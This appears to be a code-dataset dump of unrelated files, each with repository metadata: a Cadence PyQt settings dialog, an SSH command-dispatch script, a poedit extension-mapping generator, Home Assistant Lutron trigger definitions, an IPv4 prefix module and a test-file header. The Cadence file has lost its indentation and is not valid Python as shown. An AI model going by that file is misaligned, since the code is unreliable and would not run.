# Common/Shared code related to the Settings dialog
# Copyright (C) 2010-2018 Filipe Coelho <falktx@falktx.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the COPYING file
# ------------------------------------------------------------------------------------------------------------
# Imports (Global)
if True:  # use the PyQt5 imports; set to False to fall back to PyQt4
from PyQt5.QtCore import pyqtSlot, QSettings
from PyQt5.QtWidgets import QDialog, QDialogButtonBox
else:
from PyQt4.QtCore import pyqtSlot, QSettings
from PyQt4.QtGui import QDialog, QDialogButtonBox
# ------------------------------------------------------------------------------------------------------------
# Imports (Custom Stuff)
import ui_settings_app
from shared import *
from patchcanvas_theme import *
# ------------------------------------------------------------------------------------------------------------
# Global variables
# Tab indexes
TAB_INDEX_MAIN = 0
TAB_INDEX_CANVAS = 1
TAB_INDEX_LADISH = 2
TAB_INDEX_NONE = 3
# PatchCanvas defines
CANVAS_ANTIALIASING_SMALL = 1
CANVAS_EYECANDY_SMALL = 1
# LADISH defines
LADISH_CONF_KEY_DAEMON_NOTIFY = "/org/ladish/daemon/notify"
LADISH_CONF_KEY_DAEMON_SHELL = "/org/ladish/daemon/shell"
LADISH_CONF_KEY_DAEMON_TERMINAL = "/org/ladish/daemon/terminal"
LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART = "/org/ladish/daemon/studio_autostart"
LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY = "/org/ladish/daemon/js_save_delay"
# LADISH defaults
LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT = True
LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT = "sh"
LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT = "x-terminal-emulator"
LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT = True
LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY_DEFAULT = 0
# Internal defaults
global SETTINGS_DEFAULT_PROJECT_FOLDER
SETTINGS_DEFAULT_PROJECT_FOLDER = HOME
# ------------------------------------------------------------------------------------------------------------
# Change internal defaults
def setDefaultProjectFolder(folder):
global SETTINGS_DEFAULT_PROJECT_FOLDER
SETTINGS_DEFAULT_PROJECT_FOLDER = folder
# ------------------------------------------------------------------------------------------------------------
# Settings Dialog
class SettingsW(QDialog):
def __init__(self, parent, appName, hasOpenGL=False):
QDialog.__init__(self, parent)
self.ui = ui_settings_app.Ui_SettingsW()
self.ui.setupUi(self)
# -------------------------------------------------------------
# Set default settings
self.fRefreshInterval = 120
self.fAutoHideGroups = True
self.fUseSystemTray = True
self.fCloseToTray = False
# -------------------------------------------------------------
# Set app-specific settings
if appName == "catarina":
self.fAutoHideGroups = False
self.ui.lw_page.hideRow(TAB_INDEX_MAIN)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.lw_page.setCurrentCell(TAB_INDEX_CANVAS, 0)
elif appName == "catia":
self.fUseSystemTray = False
self.ui.group_main_paths.setEnabled(False)
self.ui.group_main_paths.setVisible(False)
self.ui.group_tray.setEnabled(False)
self.ui.group_tray.setVisible(False)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.lw_page.setCurrentCell(TAB_INDEX_MAIN, 0)
elif appName == "claudia":
self.ui.cb_jack_port_alias.setEnabled(False)
self.ui.cb_jack_port_alias.setVisible(False)
self.ui.label_jack_port_alias.setEnabled(False)
self.ui.label_jack_port_alias.setVisible(False)
self.ui.lw_page.setCurrentCell(TAB_INDEX_MAIN, 0)
else:
self.ui.lw_page.hideRow(TAB_INDEX_MAIN)
self.ui.lw_page.hideRow(TAB_INDEX_CANVAS)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.stackedWidget.setCurrentIndex(TAB_INDEX_NONE)
return
# -------------------------------------------------------------
# Load settings
self.loadSettings()
# -------------------------------------------------------------
# Set-up GUI
if not hasOpenGL:
self.ui.cb_canvas_use_opengl.setChecked(False)
self.ui.cb_canvas_use_opengl.setEnabled(False)
self.ui.lw_page.item(0, 0).setIcon(getIcon(appName, 48))
self.ui.label_icon_main.setPixmap(getIcon(appName, 48).pixmap(48, 48))
# -------------------------------------------------------------
# Set-up connections
self.accepted.connect(self.slot_saveSettings)
self.ui.buttonBox.button(QDialogButtonBox.Reset).clicked.connect(self.slot_resetSettings)
self.ui.b_main_def_folder_open.clicked.connect(self.slot_getAndSetProjectPath)
def loadSettings(self):
settings = QSettings()
if not self.ui.lw_page.isRowHidden(TAB_INDEX_MAIN):
self.ui.le_main_def_folder.setText(settings.value("Main/DefaultProjectFolder", SETTINGS_DEFAULT_PROJECT_FOLDER, type=str))
self.ui.cb_tray_enable.setChecked(settings.value("Main/UseSystemTray", self.fUseSystemTray, type=bool))
self.ui.cb_tray_close_to.setChecked(settings.value("Main/CloseToTray", self.fCloseToTray, type=bool))
self.ui.sb_gui_refresh.setValue(settings.value("Main/RefreshInterval", self.fRefreshInterval, type=int))
self.ui.cb_jack_port_alias.setCurrentIndex(settings.value("Main/JackPortAlias", 2, type=int))
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_CANVAS):
self.ui.cb_canvas_hide_groups.setChecked(settings.value("Canvas/AutoHideGroups", self.fAutoHideGroups, type=bool))
self.ui.cb_canvas_bezier_lines.setChecked(settings.value("Canvas/UseBezierLines", True, type=bool))
self.ui.cb_canvas_eyecandy.setCheckState(settings.value("Canvas/EyeCandy", CANVAS_EYECANDY_SMALL, type=int))
self.ui.cb_canvas_use_opengl.setChecked(settings.value("Canvas/UseOpenGL", False, type=bool))
self.ui.cb_canvas_render_aa.setCheckState(settings.value("Canvas/Antialiasing", CANVAS_ANTIALIASING_SMALL, type=int))
self.ui.cb_canvas_render_hq_aa.setChecked(settings.value("Canvas/HighQualityAntialiasing", False, type=bool))
themeName = settings.value("Canvas/Theme", getDefaultThemeName(), type=str)
for i in range(Theme.THEME_MAX):
thisThemeName = getThemeName(i)
self.ui.cb_canvas_theme.addItem(thisThemeName)
if thisThemeName == themeName:
self.ui.cb_canvas_theme.setCurrentIndex(i)
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_LADISH):
self.ui.cb_ladish_notify.setChecked(settings.value(LADISH_CONF_KEY_DAEMON_NOTIFY, LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT, type=bool))
self.ui.le_ladish_shell.setText(settings.value(LADISH_CONF_KEY_DAEMON_SHELL, LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT, type=str))
self.ui.le_ladish_terminal.setText(settings.value(LADISH_CONF_KEY_DAEMON_TERMINAL, LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT, type=str))
self.ui.cb_ladish_studio_autostart.setChecked(settings.value(LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART, LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT, type=bool))
self.ui.sb_ladish_jsdelay.setValue(settings.value(LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY, LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY_DEFAULT, type=int))
@pyqtSlot()
def slot_saveSettings(self):
settings = QSettings()
if not self.ui.lw_page.isRowHidden(TAB_INDEX_MAIN):
settings.setValue("Main/RefreshInterval", self.ui.sb_gui_refresh.value())
if self.ui.group_tray.isEnabled():
settings.setValue("Main/UseSystemTray", self.ui.cb_tray_enable.isChecked())
settings.setValue("Main/CloseToTray", self.ui.cb_tray_close_to.isChecked())
if self.ui.group_main_paths.isEnabled():
settings.setValue("Main/DefaultProjectFolder", self.ui.le_main_def_folder.text())
if self.ui.cb_jack_port_alias.isEnabled():
settings.setValue("Main/JackPortAlias", self.ui.cb_jack_port_alias.currentIndex())
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_CANVAS):
settings.setValue("Canvas/Theme", self.ui.cb_canvas_theme.currentText())
settings.setValue("Canvas/AutoHideGroups", self.ui.cb_canvas_hide_groups.isChecked())
settings.setValue("Canvas/UseBezierLines", self.ui.cb_canvas_bezier_lines.isChecked())
settings.setValue("Canvas/UseOpenGL", self.ui.cb_canvas_use_opengl.isChecked())
settings.setValue("Canvas/HighQualityAntialiasing", self.ui.cb_canvas_render_hq_aa.isChecked())
            # checkState() returns 0/1/2 (unchecked / partially checked / checked)
settings.setValue("Canvas/EyeCandy", self.ui.cb_canvas_eyecandy.checkState())
settings.setValue("Canvas/Antialiasing", self.ui.cb_canvas_render_aa.checkState())
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_LADISH):
settings.setValue(LADISH_CONF_KEY_DAEMON_NOTIFY, self.ui.cb_ladish_notify.isChecked())
settings.setValue(LADISH_CONF_KEY_DAEMON_SHELL, self.ui.le_ladish_shell.text())
settings.setValue(LADISH_CONF_KEY_DAEMON_TERMINAL, self.ui.le_ladish_terminal.text())
settings.setValue(LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART, self.ui.cb_ladish_studio_autostart.isChecked())
settings.setValue(LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY, self.ui.sb_ladish_jsdelay.value())
@pyqtSlot()
def slot_resetSettings(self):
if self.ui.lw_page.currentRow() == TAB_INDEX_MAIN:
self.ui.le_main_def_folder.setText(SETTINGS_DEFAULT_PROJECT_FOLDER)
self.ui.cb_tray_enable.setChecked(self.fUseSystemTray)
self.ui.cb_tray_close_to.setChecked(self.fCloseToTray)
self.ui.sb_gui_refresh.setValue(self.fRefreshInterval)
self.ui.cb_jack_port_alias.setCurrentIndex(2)
elif self.ui.lw_page.currentRow() == TAB_INDEX_CANVAS:
self.ui.cb_canvas_theme.setCurrentIndex(0)
self.ui.cb_canvas_hide_groups.setChecked(self.fAutoHideGroups)
self.ui.cb_canvas_bezier_lines.setChecked(True)
self.ui.cb_canvas_eyecandy.setCheckState(Qt.PartiallyChecked)
self.ui.cb_canvas_use_opengl.setChecked(False)
self.ui.cb_canvas_render_aa.setCheckState(Qt.PartiallyChecked)
self.ui.cb_canvas_render_hq_aa.setChecked(False)
elif self.ui.lw_page.currentRow() == TAB_INDEX_LADISH:
self.ui.cb_ladish_notify.setChecked(LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT)
self.ui.cb_ladish_studio_autostart.setChecked(LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT)
self.ui.le_ladish_shell.setText(LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT)
self.ui.le_ladish_terminal.setText(LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT)
@pyqtSlot()
def slot_getAndSetProjectPath(self):
getAndSetPath(self, self.ui.le_main_def_folder.text(), self.ui.le_main_def_folder)
def done(self, r):
QDialog.done(self, r)
self.close()
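# ------------------------------------------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original file): the dialog is meant
# to be opened from one of the host applications (catarina/catia/claudia).  The
# parent window and folder below are placeholders.
#
#     setDefaultProjectFolder(os.path.expanduser("~/projects"))   # optional
#     dialog = SettingsW(parentWindow, "catia", hasOpenGL=True)
#     if dialog.exec_():        # accepted() is connected to slot_saveSettings()
#         pass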
|
falkTX/Cadence
|
src/shared_settings.py
|
Python
|
gpl-2.0
| 12,056 | 0.004728 |
#!/usr/bin/env python
import subprocess
"""
An SSH-based command dispatch system
"""
machines = ["10.0.1.40",
"10.0.1.50",
"10.0.1.51",
"10.0.1.60",
"10.0.1.80"]
cmd = "python /src/fingerprint.py"
for machine in machines:
subprocess.call("ssh root@%s %s" % (machine, cmd), shell=True)
|
lluxury/P_U_S_A
|
8_OS_Soup/code/dispatch1.py
|
Python
|
mit
| 297 | 0.016835 |
#!/usr/bin/env python3
# Update the file viewer's file-extension -> highlighting-language mappings from
# the data published by Prism (components.json) and the language-map project
# (see PRISM_COMPONENTS_URL and LANGUAGE_MAP_URL below)
import os.path
import sys
import urllib.request
import re
import json
PRISM_COMPONENTS_URL = 'https://github.com/PrismJS/prism/raw/master/components.json'
LANGUAGE_MAP_URL = 'https://github.com/blakeembrey/language-map/raw/master/languages.json'
# resolve ambiguities:
OVERRIDES = {
'h' : 'cpp',
'inc' : 'php',
'cake' : 'coffeescript',
'es' : 'javascript',
'fcgi' : 'lua',
'cgi' : 'perl',
'pl' : 'perl',
'pro' : 'perl',
'ts' : 'typescript',
'tsx' : 'typescript',
'sch' : 'scheme',
'cs' : 'csharp',
'st' : 'smalltalk',
}
# known irrelevant languages:
BLACKLIST = set([
'glsl', 'nginx', 'apacheconf', 'matlab', 'opencl', 'puppet', 'reason', 'renpy',
'plsql', 'sql', 'tex',
])
# ...and extensions:
BLACKLIST_EXT = set([
'spec', 'pluginspec', 'ml',
])
MARKER_BEGIN = "// Code generated with scripts/extract-fileviewer-mappings.py begins here"
MARKER_END = "// Code generated with scripts/extract-fileviewer-mappings.py ends here"
prism_langs = json.loads(urllib.request.urlopen(PRISM_COMPONENTS_URL).read().decode('utf-8'))['languages']
del prism_langs['meta']
language_map = json.loads(urllib.request.urlopen(LANGUAGE_MAP_URL).read().decode('utf-8'))
prism_known = {}
for lang, data in prism_langs.items():
prism_known[lang] = lang
for a in data.get('alias', []):
prism_known[a] = lang
ext_to_lang = {}
for lang, data in language_map.items():
lang = lang.lower()
lango = lang
if not lang in prism_known:
for a in data.get('aliases', []):
if a in prism_known:
lang = a
break
if lang not in prism_known:
continue
if lang in BLACKLIST:
continue
for ext in data.get('extensions', []):
assert ext[0] == '.'
ext = ext[1:].lower()
if ext in BLACKLIST_EXT:
continue
if ext != lang:
if ext in ext_to_lang:
if ext in OVERRIDES:
ext_to_lang[ext] = OVERRIDES[ext]
else:
sys.stderr.write(f'SKIPPING due to extension conflict: {ext} both {lang} and {ext_to_lang[ext]}\n')
ext_to_lang[ext] = lang
else:
ext_to_lang[ext] = lang
output = f'{MARKER_BEGIN}\n\n'
for ext in sorted(ext_to_lang.keys()):
lang = ext_to_lang[ext]
output += f'{{ "{ext}", "{lang}" }},\n'
output += f'\n{MARKER_END}\n'
if os.path.isfile("src/fileviewer.extensions.h"):
outfname = "src/fileviewer.extensions.h"
else:
raise RuntimeError("run this script from project root directory")
with open(outfname, "rt") as f:
orig_content = f.read()
content = re.sub('%s(.*?)%s' % (MARKER_BEGIN, MARKER_END),
output,
orig_content,
0,
re.DOTALL)
with open(outfname, "wt") as f:
f.write(content)
print(output)
sys.stderr.write(f'Generated code written to {outfname}\n')
|
vslavik/poedit
|
scripts/extract-fileviewer-mappings.py
|
Python
|
mit
| 3,349 | 0.008361 |
"""Provides device triggers for lutron caseta."""
from __future__ import annotations
from typing import Any
import voluptuous as vol
from homeassistant.components.automation import (
AutomationActionType,
AutomationTriggerInfo,
)
from homeassistant.components.device_automation import DEVICE_TRIGGER_BASE_SCHEMA
from homeassistant.components.device_automation.exceptions import (
InvalidDeviceAutomationConfig,
)
from homeassistant.components.homeassistant.triggers import event as event_trigger
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_DOMAIN,
CONF_EVENT,
CONF_PLATFORM,
CONF_TYPE,
)
from homeassistant.core import CALLBACK_TYPE, HomeAssistant
from homeassistant.helpers.typing import ConfigType
from .const import (
ACTION_PRESS,
ACTION_RELEASE,
ATTR_ACTION,
ATTR_BUTTON_NUMBER,
ATTR_SERIAL,
BUTTON_DEVICES,
CONF_SUBTYPE,
DOMAIN,
LUTRON_CASETA_BUTTON_EVENT,
)
SUPPORTED_INPUTS_EVENTS_TYPES = [ACTION_PRESS, ACTION_RELEASE]
LUTRON_BUTTON_TRIGGER_SCHEMA = DEVICE_TRIGGER_BASE_SCHEMA.extend(
{
vol.Required(CONF_TYPE): vol.In(SUPPORTED_INPUTS_EVENTS_TYPES),
}
)
PICO_2_BUTTON_BUTTON_TYPES = {
"on": 2,
"off": 4,
}
PICO_2_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_2_BUTTON_BUTTON_TYPES),
}
)
PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES = {
"on": 2,
"off": 4,
"raise": 5,
"lower": 6,
}
PICO_2_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES),
}
)
PICO_3_BUTTON_BUTTON_TYPES = {
"on": 2,
"stop": 3,
"off": 4,
}
PICO_3_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_3_BUTTON_BUTTON_TYPES),
}
)
PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES = {
"on": 2,
"stop": 3,
"off": 4,
"raise": 5,
"lower": 6,
}
PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES),
}
)
PICO_4_BUTTON_BUTTON_TYPES = {
"button_1": 8,
"button_2": 9,
"button_3": 10,
"button_4": 11,
}
PICO_4_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_BUTTON_TYPES),
}
)
PICO_4_BUTTON_ZONE_BUTTON_TYPES = {
"on": 8,
"raise": 9,
"lower": 10,
"off": 11,
}
PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_ZONE_BUTTON_TYPES),
}
)
PICO_4_BUTTON_SCENE_BUTTON_TYPES = {
"button_1": 8,
"button_2": 9,
"button_3": 10,
"off": 11,
}
PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_SCENE_BUTTON_TYPES),
}
)
PICO_4_BUTTON_2_GROUP_BUTTON_TYPES = {
"group_1_button_1": 8,
"group_1_button_2": 9,
"group_2_button_1": 10,
"group_2_button_2": 11,
}
PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_2_GROUP_BUTTON_TYPES),
}
)
FOUR_GROUP_REMOTE_BUTTON_TYPES = {
"open_all": 2,
"stop_all": 3,
"close_all": 4,
"raise_all": 5,
"lower_all": 6,
"open_1": 10,
"stop_1": 11,
"close_1": 12,
"raise_1": 13,
"lower_1": 14,
"open_2": 18,
"stop_2": 19,
"close_2": 20,
"raise_2": 21,
"lower_2": 22,
"open_3": 26,
"stop_3": 27,
"close_3": 28,
"raise_3": 29,
"lower_3": 30,
"open_4": 34,
"stop_4": 35,
"close_4": 36,
"raise_4": 37,
"lower_4": 38,
}
FOUR_GROUP_REMOTE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(FOUR_GROUP_REMOTE_BUTTON_TYPES),
}
)
DEVICE_TYPE_SCHEMA_MAP = {
"Pico2Button": PICO_2_BUTTON_TRIGGER_SCHEMA,
"Pico2ButtonRaiseLower": PICO_2_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
"Pico3Button": PICO_3_BUTTON_TRIGGER_SCHEMA,
"Pico3ButtonRaiseLower": PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
"Pico4Button": PICO_4_BUTTON_TRIGGER_SCHEMA,
"Pico4ButtonScene": PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA,
"Pico4ButtonZone": PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA,
"Pico4Button2Group": PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA,
"FourGroupRemote": FOUR_GROUP_REMOTE_TRIGGER_SCHEMA,
}
DEVICE_TYPE_SUBTYPE_MAP = {
"Pico2Button": PICO_2_BUTTON_BUTTON_TYPES,
"Pico2ButtonRaiseLower": PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES,
"Pico3Button": PICO_3_BUTTON_BUTTON_TYPES,
"Pico3ButtonRaiseLower": PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES,
"Pico4Button": PICO_4_BUTTON_BUTTON_TYPES,
"Pico4ButtonScene": PICO_4_BUTTON_SCENE_BUTTON_TYPES,
"Pico4ButtonZone": PICO_4_BUTTON_ZONE_BUTTON_TYPES,
"Pico4Button2Group": PICO_4_BUTTON_2_GROUP_BUTTON_TYPES,
"FourGroupRemote": FOUR_GROUP_REMOTE_BUTTON_TYPES,
}
TRIGGER_SCHEMA = vol.Any(
PICO_2_BUTTON_TRIGGER_SCHEMA,
PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
PICO_4_BUTTON_TRIGGER_SCHEMA,
PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA,
PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA,
PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA,
FOUR_GROUP_REMOTE_TRIGGER_SCHEMA,
)
async def async_validate_trigger_config(hass: HomeAssistant, config: ConfigType):
"""Validate config."""
# if device is available verify parameters against device capabilities
device = get_button_device_by_dr_id(hass, config[CONF_DEVICE_ID])
if not device:
return config
schema = DEVICE_TYPE_SCHEMA_MAP.get(device["type"])
if not schema:
raise InvalidDeviceAutomationConfig(
f"Device type {device['type']} not supported: {config[CONF_DEVICE_ID]}"
)
return schema(config)
async def async_get_triggers(
hass: HomeAssistant, device_id: str
) -> list[dict[str, Any]]:
"""List device triggers for lutron caseta devices."""
triggers = []
device = get_button_device_by_dr_id(hass, device_id)
if not device:
raise InvalidDeviceAutomationConfig(f"Device not found: {device_id}")
valid_buttons = DEVICE_TYPE_SUBTYPE_MAP.get(device["type"], [])
for trigger in SUPPORTED_INPUTS_EVENTS_TYPES:
for subtype in valid_buttons:
triggers.append(
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_TYPE: trigger,
CONF_SUBTYPE: subtype,
}
)
return triggers
async def async_attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: AutomationActionType,
automation_info: AutomationTriggerInfo,
) -> CALLBACK_TYPE:
"""Attach a trigger."""
device = get_button_device_by_dr_id(hass, config[CONF_DEVICE_ID])
schema = DEVICE_TYPE_SCHEMA_MAP.get(device["type"])
valid_buttons = DEVICE_TYPE_SUBTYPE_MAP.get(device["type"])
config = schema(config)
event_config = {
event_trigger.CONF_PLATFORM: CONF_EVENT,
event_trigger.CONF_EVENT_TYPE: LUTRON_CASETA_BUTTON_EVENT,
event_trigger.CONF_EVENT_DATA: {
ATTR_SERIAL: device["serial"],
ATTR_BUTTON_NUMBER: valid_buttons[config[CONF_SUBTYPE]],
ATTR_ACTION: config[CONF_TYPE],
},
}
event_config = event_trigger.TRIGGER_SCHEMA(event_config)
return await event_trigger.async_attach_trigger(
hass, event_config, action, automation_info, platform_type="device"
)
def get_button_device_by_dr_id(hass: HomeAssistant, device_id: str):
"""Get a lutron device for the given device id."""
if DOMAIN not in hass.data:
return None
for config_entry in hass.data[DOMAIN]:
button_devices = hass.data[DOMAIN][config_entry][BUTTON_DEVICES]
device = button_devices.get(device_id)
if device:
return device
return None
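# Illustrative example (not part of the original module): the kind of device
# trigger this module lists and validates, written as automation YAML.  The
# device_id is a placeholder, and the literal "press"/"release" strings assume
# ACTION_PRESS == "press" and ACTION_RELEASE == "release"; check const.py for
# the real values.
#
#   trigger:
#     platform: device
#     domain: lutron_caseta
#     device_id: 0123456789abcdef0123456789abcdef
#     type: press          # or: release
#     subtype: "on"        # must be a button defined for the Pico model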
|
Danielhiversen/home-assistant
|
homeassistant/components/lutron_caseta/device_trigger.py
|
Python
|
apache-2.0
| 8,121 | 0.000739 |
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
from functools import lru_cache, total_ordering
import re
@total_ordering
class IpAddr:
"""Models an IPv4 32-bit address."""
dotted_quad_re = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
def __init__(self, dotted_quad):
if isinstance(dotted_quad, IpAddr):
dotted_quad = dotted_quad.decimal()
m = self.dotted_quad_re.search(dotted_quad)
assert m, dotted_quad # Input must be a valid decimal IPv4 address.
four_bytes = map(int, dotted_quad.split("."))
self.addr = self._combine(four_bytes)
@staticmethod
def _combine(nums):
acc = 0
for num in nums:
assert 0 <= num < 0x100, num
acc *= 0x100
acc += num
return acc
def _get_addr_bytes(self):
a = self.addr
bytes = []
for _ in range(4):
bytes.append(a & 0xFF)
a //= 0x100
return reversed(bytes)
def __str__(self):
return f"{self.addr:08x}"
def hex(self):
return self.__str__()
def decimal(self):
return ".".join(map(str, self._get_addr_bytes()))
def decimal03(self):
"""Returns e.g. 001.002.003.004. Lexical and numeric collations match."""
return ".".join([f"{b:03d}"
for b in self._get_addr_bytes()])
# from https://docs.python.org/3/library/functools.html#functools.total_ordering
@staticmethod
def _is_valid_operand(other):
return (hasattr(other, "addr")
and isinstance(other.addr, int)
and other.addr >= 0)
@classmethod
def _invalid(cls, other):
if cls._is_valid_operand(other):
return None # We can keep going.
else:
return NotImplemented # Prohibit further processing.
def __eq__(self, other):
return self._invalid(other) or self.addr == other.addr
def __lt__(self, other):
return self._invalid(other) or self.addr < other.addr
@total_ordering
class Prefix:
"""Models an IPv4 CIDR prefix: 32-bit address + mask."""
def __init__(self, ip: IpAddr, masklen=None):
if isinstance(ip, str) and "/" in ip:
ip, masklen = ip.split("/")
self.masklen = int(masklen)
assert 0 <= self.masklen <= 32, masklen
self.ip = IpAddr(ip)
self.ip.addr &= self.mask() # Canonicalize. Host part must be all zero.
def __str__(self):
return self.ip.decimal() + f"/{self.masklen}"
@staticmethod
@lru_cache()
def _mask(masklen: int):
# net_bits = masklen # network part, e.g. 24 in a class C
# host_bits = 32 - net_bits # host part, e.g. 8 in a class C
net_mask = 0
bit_val = 2 ** 32 # Start with MSB.
for _ in range(masklen):
bit_val //= 2 # Right shift one position.
net_mask |= bit_val
return net_mask
def mask(self):
return self._mask(self.masklen)
def __contains__(self, item: IpAddr):
a1 = self.ip.addr & self.mask()
a2 = item.addr & self.mask()
return a1 == a2
@staticmethod
def _is_valid_operand(other): # Other is a prefix that has an IP, and a mask.
return (hasattr(other, 'ip')
and IpAddr._is_valid_operand(other.ip)
and hasattr(other, 'masklen')
and 0 <= other.masklen <= 32)
@classmethod
def _invalid(cls, other):
if cls._is_valid_operand(other):
return None # We can keep going.
else:
return NotImplemented # Prohibit further processing.
def __eq__(self, other):
return self._invalid(other) or (self.ip.addr, self.masklen) == (other.ip.addr, other.masklen)
def __lt__(self, other):
return self._invalid(other) or (self.ip.addr, self.masklen) < (other.ip.addr, other.masklen)
def log_dist(a: IpAddr, b: IpAddr):
"""Finds the distance beween IPs, according to a logarithmic distance metric."""
prefix = Prefix(b, 32)
while (prefix.masklen > 0
and a not in prefix):
assert b in prefix, (b, prefix)
prefix.masklen -= 1
assert b in prefix, (b, prefix)
assert a in prefix, (a, prefix)
assert 0 <= prefix.masklen <= 32
log_distance = 32 - prefix.masklen
return log_distance
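# Illustrative usage sketch (not part of the original module); the addresses
# below are made up purely to exercise the classes defined above.
if __name__ == '__main__':
    a = IpAddr('10.0.0.1')
    b = IpAddr('10.0.0.2')
    net = Prefix('10.0.0.0/24')
    assert a in net and b in net          # membership via Prefix.__contains__
    assert log_dist(a, b) == 2            # the two hosts first share a prefix at /30
    print(net, a.decimal03(), b.hex())    # 10.0.0.0/24 010.000.000.001 0a000002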
|
jhanley634/testing-tools
|
problem/weblog/prefix/ip_addr.py
|
Python
|
mit
| 5,425 | 0.00129 |
"""Automated tests for entering CDI forms manually.
Copyright (C) 2014 A. Samuel Pottinger ("Sam Pottinger", gleap.org)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# Do not type check in tests
# type: ignore
import collections
import copy
import datetime
import json
import unittest
import unittest.mock
import cdibase
from ..struct import models
from ..util import constants
from ..util import db_util
from ..util import filter_util
from ..util import math_util
from ..util import recalc_util
from ..util import user_util
TEST_EMAIL = 'test.email@example.com'
TEST_DB_ID = '1'
